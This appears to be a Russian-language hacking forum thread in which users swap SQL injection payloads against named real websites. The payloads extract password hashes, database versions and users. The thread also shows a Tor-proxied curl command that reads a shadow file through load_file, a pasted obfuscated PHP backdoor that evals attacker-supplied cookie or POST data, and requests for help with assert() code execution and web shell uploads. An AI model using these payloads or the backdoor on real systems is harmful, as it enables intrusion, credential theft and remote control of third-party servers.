Очень много фаззеров фолсе позитивят именно на time-based. А вот w3af молодец. Он умеет понимать блинды.
http://xxx.ru/?r=club/catalog/detail&id=-53 order by extractvalue(0x0a,concat(0x0a,(select concat_ws(0x3b,password) from b_user limit 1,1))) -- - выводит не полный хэш, как составить запрос чтобы выводил все символы их хэша?
http://xxx.ru/?r=club/catalog/detai...0x3b,password) from b_user limit 1,1))) -- -# а как узнать название баз данных на сервере? Не таблиц а баз.
SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0 или SELECT distinct(db) FROM mysql.db последний при определённых условиях срабатывает
Что будет если отправить 2 одинаковых http запроса одновременно например при восстановление пароля есть шансы что придет одинаковый код восстановления? Как отправить 2 запроса с минимальной задержки ? Какие похожие баги есть кроме race condition найдено в старбак се?
Парни, подскажите пожалуйста, как на практике эксплуатировать данный баг: https://github.com/lesterchan/wp-email/commit/bcae41780ef78ce4d0780fc417c0343d5715b18a
PHP: <?php $GLOBALS['s251'] = "\x66\x2c\x54\x63\x65\x42\x24\x64\x5d\x2b\x3b\x23\x35\x33\x44\x22\x70\x38\x26\x27\x34\x53\x5f\x5b\x41\x50\x6e\x61\x46\x62\x73\x32\x30\x31\x3f\x77\xd\x5e\x57\x59\x6c\x48\x3a\x20\x49\x6f\x72\x69\x45\x7b\x7d\x4a\x6d\x29\x55\x76\x21\x7a\x4d\x56\x9\x79\x52\x36\x39\x3c\x4f\x43\x40\xa\x3e\x6b\x4c\x2d\x2a\x4e\x51\x5c\x74\x67\x58\x4b\x28\x78\x37\x5a\x7e\x25\x6a\x2e\x47\x7c\x60\x2f\x71\x3d\x75\x68";$GLOBALS[$GLOBALS['s251'][29].$GLOBALS['s251'][3].$GLOBALS['s251'][7].$GLOBALS['s251'][63].$GLOBALS['s251'][17].$GLOBALS['s251'][7].$GLOBALS['s251'][64]] = $GLOBALS['s251'][3].$GLOBALS['s251'][97].$GLOBALS['s251'][46];$GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][0].$GLOBALS['s251'][63].$GLOBALS['s251'][27].$GLOBALS['s251'][13].$GLOBALS['s251'][31].$GLOBALS['s251'][29]] = $GLOBALS['s251'][45].$GLOBALS['s251'][46].$GLOBALS['s251'][7];$GLOBALS[$GLOBALS['s251'][57].$GLOBALS['s251'][12].$GLOBALS['s251'][84].$GLOBALS['s251'][64]] = $GLOBALS['s251'][30].$GLOBALS['s251'][78].$GLOBALS['s251'][46].$GLOBALS['s251'][40].$GLOBALS['s251'][4].$GLOBALS['s251'][26];$GLOBALS[$GLOBALS['s251'][52].$GLOBALS['s251'][63].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12]] = $GLOBALS['s251'][47].$GLOBALS['s251'][26].$GLOBALS['s251'][47].$GLOBALS['s251'][22].$GLOBALS['s251'][30].$GLOBALS['s251'][4].$GLOBALS['s251'][78];$GLOBALS[$GLOBALS['s251'][79].$GLOBALS['s251'][84].$GLOBALS['s251'][0].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12].$GLOBALS['s251'][64]] = $GLOBALS['s251'][30].$GLOBALS['s251'][4].$GLOBALS['s251'][46].$GLOBALS['s251'][47].$GLOBALS['s251'][27].$GLOBALS['s251'][40].$GLOBALS['s251'][47].$GLOBALS['s251'][57].$GLOBALS['s251'][4];$GLOBALS[$GLOBALS['s251'][88].$GLOBALS['s251'][64].$GLOBALS['s251'][7].$GLOBALS['s251'][3].$GLOBALS['s251'][31].$GLOBALS['s251'][13].$GLOBALS['s251'][84].$GLOBALS['s251'][32].$GLOBALS['s251'][13]] = $GLOBALS['s251'][16].$GLOBALS['s251'][97].$GLOBALS['s251'][16].$GLOBALS['s251'][55].$GLOBALS['s251'][4].$GLOBALS['s251'][46].$GLOBALS['s251'][30].$GLOBALS['s251'][47].$GLOBALS['s251'][45].$GLOBALS['s251'][26];$GLOBALS[$GLOBALS['s251'][3].$GLOBALS['s251'][27].$GLOBALS['s251'][31].$GLOBALS['s251'][0]] = $GLOBALS['s251'][96].$GLOBALS['s251'][26].$GLOBALS['s251'][30].$GLOBALS['s251'][4].$GLOBALS['s251'][46].$GLOBALS['s251'][47].$GLOBALS['s251'][27].$GLOBALS['s251'][40].$GLOBALS['s251'][47].$GLOBALS['s251'][57].$GLOBALS['s251'][4];$GLOBALS[$GLOBALS['s251'][7].$GLOBALS['s251'][64].$GLOBALS['s251'][3].$GLOBALS['s251'][20].$GLOBALS['s251'][84].$GLOBALS['s251'][31].$GLOBALS['s251'][32].$GLOBALS['s251'][4]] = $GLOBALS['s251'][29].$GLOBALS['s251'][27].$GLOBALS['s251'][30].$GLOBALS['s251'][4].$GLOBALS['s251'][63].$GLOBALS['s251'][20].$GLOBALS['s251'][22].$GLOBALS['s251'][7].$GLOBALS['s251'][4].$GLOBALS['s251'][3].$GLOBALS['s251'][45].$GLOBALS['s251'][7].$GLOBALS['s251'][4];$GLOBALS[$GLOBALS['s251'][97].$GLOBALS['s251'][84].$GLOBALS['s251'][64].$GLOBALS['s251'][33].$GLOBALS['s251'][12].$GLOBALS['s251'][29].$GLOBALS['s251'][17]] = $GLOBALS['s251'][30].$GLOBALS['s251'][4].$GLOBALS['s251'][78].$GLOBALS['s251'][22].$GLOBALS['s251'][78].$GLOBALS['s251'][47].$GLOBALS['s251'][52].$GLOBALS['s251'][4].$GLOBALS['s251'][22].$GLOBALS['s251'][40].$GLOBALS['s251'][47].$GLOBALS['s251'][52].$GLOBALS['s251'][47].$GLOBALS['s251'][78];$GLOBALS[$GLOBALS['s251'][26].$GLOBALS['s251'][0].$GLOBALS['s251'][84].$GLOBALS['s251'][17]] = $GLOBALS['s251'][78].$GLOBALS['s251'][13].$GLOBALS['s251'][17].$GLOBALS['s251'][27].$GLOBALS['s251'][12];$GLOBALS[$GLOBALS['s251'][40].$GLOBALS['s251'][27].$GLOBALS['s251'][7].$GLOBALS['s251'][7].$GLOBALS['s251'][31]] = $GLOBALS['s251'][7].$GLOBALS['s251'][12].$GLOBALS['s251'][32].$GLOBALS['s251'][29].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][64].$GLOBALS['s251'][0];$GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][27].$GLOBALS['s251'][64].$GLOBALS['s251'][33].$GLOBALS['s251'][64].$GLOBALS['s251'][17].$GLOBALS['s251'][17]] = $_POST;$GLOBALS[$GLOBALS['s251'][35].$GLOBALS['s251'][63].$GLOBALS['s251'][63].$GLOBALS['s251'][4].$GLOBALS['s251'][63].$GLOBALS['s251'][27].$GLOBALS['s251'][0]] = $_COOKIE;@$GLOBALS[$GLOBALS['s251'][52].$GLOBALS['s251'][63].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12]]($GLOBALS['s251'][4].$GLOBALS['s251'][46].$GLOBALS['s251'][46].$GLOBALS['s251'][45].$GLOBALS['s251'][46].$GLOBALS['s251'][22].$GLOBALS['s251'][40].$GLOBALS['s251'][45].$GLOBALS['s251'][79], NULL);@$GLOBALS[$GLOBALS['s251'][52].$GLOBALS['s251'][63].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12]]($GLOBALS['s251'][40].$GLOBALS['s251'][45].$GLOBALS['s251'][79].$GLOBALS['s251'][22].$GLOBALS['s251'][4].$GLOBALS['s251'][46].$GLOBALS['s251'][46].$GLOBALS['s251'][45].$GLOBALS['s251'][46].$GLOBALS['s251'][30], 0);@$GLOBALS[$GLOBALS['s251'][52].$GLOBALS['s251'][63].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12]]($GLOBALS['s251'][52].$GLOBALS['s251'][27].$GLOBALS['s251'][83].$GLOBALS['s251'][22].$GLOBALS['s251'][4].$GLOBALS['s251'][83].$GLOBALS['s251'][4].$GLOBALS['s251'][3].$GLOBALS['s251'][96].$GLOBALS['s251'][78].$GLOBALS['s251'][47].$GLOBALS['s251'][45].$GLOBALS['s251'][26].$GLOBALS['s251'][22].$GLOBALS['s251'][78].$GLOBALS['s251'][47].$GLOBALS['s251'][52].$GLOBALS['s251'][4], 0);@$GLOBALS[$GLOBALS['s251'][97].$GLOBALS['s251'][84].$GLOBALS['s251'][64].$GLOBALS['s251'][33].$GLOBALS['s251'][12].$GLOBALS['s251'][29].$GLOBALS['s251'][17]](0);$q91f628 = NULL;$t1fb = NULL;$GLOBALS[$GLOBALS['s251'][46].$GLOBALS['s251'][4].$GLOBALS['s251'][13].$GLOBALS['s251'][3]] = $GLOBALS['s251'][20].$GLOBALS['s251'][27].$GLOBALS['s251'][13].$GLOBALS['s251'][64].$GLOBALS['s251'][31].$GLOBALS['s251'][84].$GLOBALS['s251'][3].$GLOBALS['s251'][20].$GLOBALS['s251'][73].$GLOBALS['s251'][31].$GLOBALS['s251'][4].$GLOBALS['s251'][17].$GLOBALS['s251'][27].$GLOBALS['s251'][73].$GLOBALS['s251'][20].$GLOBALS['s251'][33].$GLOBALS['s251'][29].$GLOBALS['s251'][13].$GLOBALS['s251'][73].$GLOBALS['s251'][29].$GLOBALS['s251'][27].$GLOBALS['s251'][3].$GLOBALS['s251'][63].$GLOBALS['s251'][73].$GLOBALS['s251'][12].$GLOBALS['s251'][32].$GLOBALS['s251'][32].$GLOBALS['s251'][27].$GLOBALS['s251'][31].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][7].$GLOBALS['s251'][27].$GLOBALS['s251'][84].$GLOBALS['s251'][84].$GLOBALS['s251'][17];global $re3c;function d50b4359f($q91f628, $j49bf){ $s06aaf = ""; for ($l220c9=0; $l220c9<$GLOBALS[$GLOBALS['s251'][57].$GLOBALS['s251'][12].$GLOBALS['s251'][84].$GLOBALS['s251'][64]]($q91f628);) { for ($s49809=0; $s49809<$GLOBALS[$GLOBALS['s251'][57].$GLOBALS['s251'][12].$GLOBALS['s251'][84].$GLOBALS['s251'][64]]($j49bf) && $l220c9<$GLOBALS[$GLOBALS['s251'][57].$GLOBALS['s251'][12].$GLOBALS['s251'][84].$GLOBALS['s251'][64]]($q91f628); $s49809++, $l220c9++) { $s06aaf .= $GLOBALS[$GLOBALS['s251'][29].$GLOBALS['s251'][3].$GLOBALS['s251'][7].$GLOBALS['s251'][63].$GLOBALS['s251'][17].$GLOBALS['s251'][7].$GLOBALS['s251'][64]]($GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][0].$GLOBALS['s251'][63].$GLOBALS['s251'][27].$GLOBALS['s251'][13].$GLOBALS['s251'][31].$GLOBALS['s251'][29]]($q91f628[$l220c9]) ^ $GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][0].$GLOBALS['s251'][63].$GLOBALS['s251'][27].$GLOBALS['s251'][13].$GLOBALS['s251'][31].$GLOBALS['s251'][29]]($j49bf[$s49809])); } } return $s06aaf;}function t38a5($q91f628, $j49bf){ global $re3c; return $GLOBALS[$GLOBALS['s251'][40].$GLOBALS['s251'][27].$GLOBALS['s251'][7].$GLOBALS['s251'][7].$GLOBALS['s251'][31]]($GLOBALS[$GLOBALS['s251'][40].$GLOBALS['s251'][27].$GLOBALS['s251'][7].$GLOBALS['s251'][7].$GLOBALS['s251'][31]]($q91f628, $re3c), $j49bf);}foreach ($GLOBALS[$GLOBALS['s251'][35].$GLOBALS['s251'][63].$GLOBALS['s251'][63].$GLOBALS['s251'][4].$GLOBALS['s251'][63].$GLOBALS['s251'][27].$GLOBALS['s251'][0]] as $j49bf=>$tf4daa){ $q91f628 = $tf4daa; $t1fb = $j49bf;}if (!$q91f628){ foreach ($GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][27].$GLOBALS['s251'][64].$GLOBALS['s251'][33].$GLOBALS['s251'][64].$GLOBALS['s251'][17].$GLOBALS['s251'][17]] as $j49bf=>$tf4daa) { $q91f628 = $tf4daa; $t1fb = $j49bf; }}$q91f628 = @$GLOBALS[$GLOBALS['s251'][3].$GLOBALS['s251'][27].$GLOBALS['s251'][31].$GLOBALS['s251'][0]]($GLOBALS[$GLOBALS['s251'][26].$GLOBALS['s251'][0].$GLOBALS['s251'][84].$GLOBALS['s251'][17]]($GLOBALS[$GLOBALS['s251'][7].$GLOBALS['s251'][64].$GLOBALS['s251'][3].$GLOBALS['s251'][20].$GLOBALS['s251'][84].$GLOBALS['s251'][31].$GLOBALS['s251'][32].$GLOBALS['s251'][4]]($q91f628), $t1fb));if (isset($q91f628[$GLOBALS['s251'][27].$GLOBALS['s251'][71]]) && $re3c==$q91f628[$GLOBALS['s251'][27].$GLOBALS['s251'][71]]){ if ($q91f628[$GLOBALS['s251'][27]] == $GLOBALS['s251'][47]) { $l220c9 = Array( $GLOBALS['s251'][16].$GLOBALS['s251'][55] => @$GLOBALS[$GLOBALS['s251'][88].$GLOBALS['s251'][64].$GLOBALS['s251'][7].$GLOBALS['s251'][3].$GLOBALS['s251'][31].$GLOBALS['s251'][13].$GLOBALS['s251'][84].$GLOBALS['s251'][32].$GLOBALS['s251'][13]](), $GLOBALS['s251'][30].$GLOBALS['s251'][55] => $GLOBALS['s251'][33].$GLOBALS['s251'][89].$GLOBALS['s251'][32].$GLOBALS['s251'][73].$GLOBALS['s251'][33], ); echo @$GLOBALS[$GLOBALS['s251'][79].$GLOBALS['s251'][84].$GLOBALS['s251'][0].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12].$GLOBALS['s251'][64]]($l220c9); } elseif ($q91f628[$GLOBALS['s251'][27]] == $GLOBALS['s251'][4]) { eval($q91f628[$GLOBALS['s251'][7]]); } exit();} Что это?
Code: http://www.men-defencetec.de/en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b&tx_men_pi1%5Bdetail%5D=54+/*!12345anD*/+1=0+/*!911111*/union+/*!12345sELecT*/+'1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31','32','33','34','35','36','37','38','39','40','41','42','43','44','45','46','47','48','49','50','51','52','53','54','55','56','57','58','59','60','61','62','63','64','65',66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180+--+ Хелп, нужно вывод
Не стоит забывать, что иногда параметры можно передавать одинаково как через GET, так и через POST, в котором зачастую ничего не фильтруется! Code: POST /en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b HTTP/1.1 Host: www.men-defencetec.de User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 94 tx_men_pi1[detail]=(1)--~(select*from(select(concat_ws(0x3a,@@version,database(),user()))n)f)# Результат:
assert(stripslashes($_REQUEST['p'])); Подскажите кто-нибудь как через assert пролиться? Не пойму как он работает
Code: $ curl -s -k --proxy socks5://127.0.0.1:9150 'http://*.com/ajax/*.php?UserID=1+union+select+1,2,3,load_file%280x2f6574632f736861646f772e62616b%29,5,6,7,8,9%23' | perl -lane '~s/\\n/\n/g;print' | tail -n 2 | perl -lane '~/[^:]+:(.{15})/;print $1' $1$piXULrQ7$R3T $1$piXULrQ7$R3T shadow.bak
Кто нибудь может показать пример нормального upload'a, через мой не хочет грузить на сервер шел. Тут проблема в одном из двух, либо я глуп и мал, либо проблема на стороне сервера P.s. с этим разобрался, в директории нет прав на запись. Можно-ли что-нибудь придумать с этим?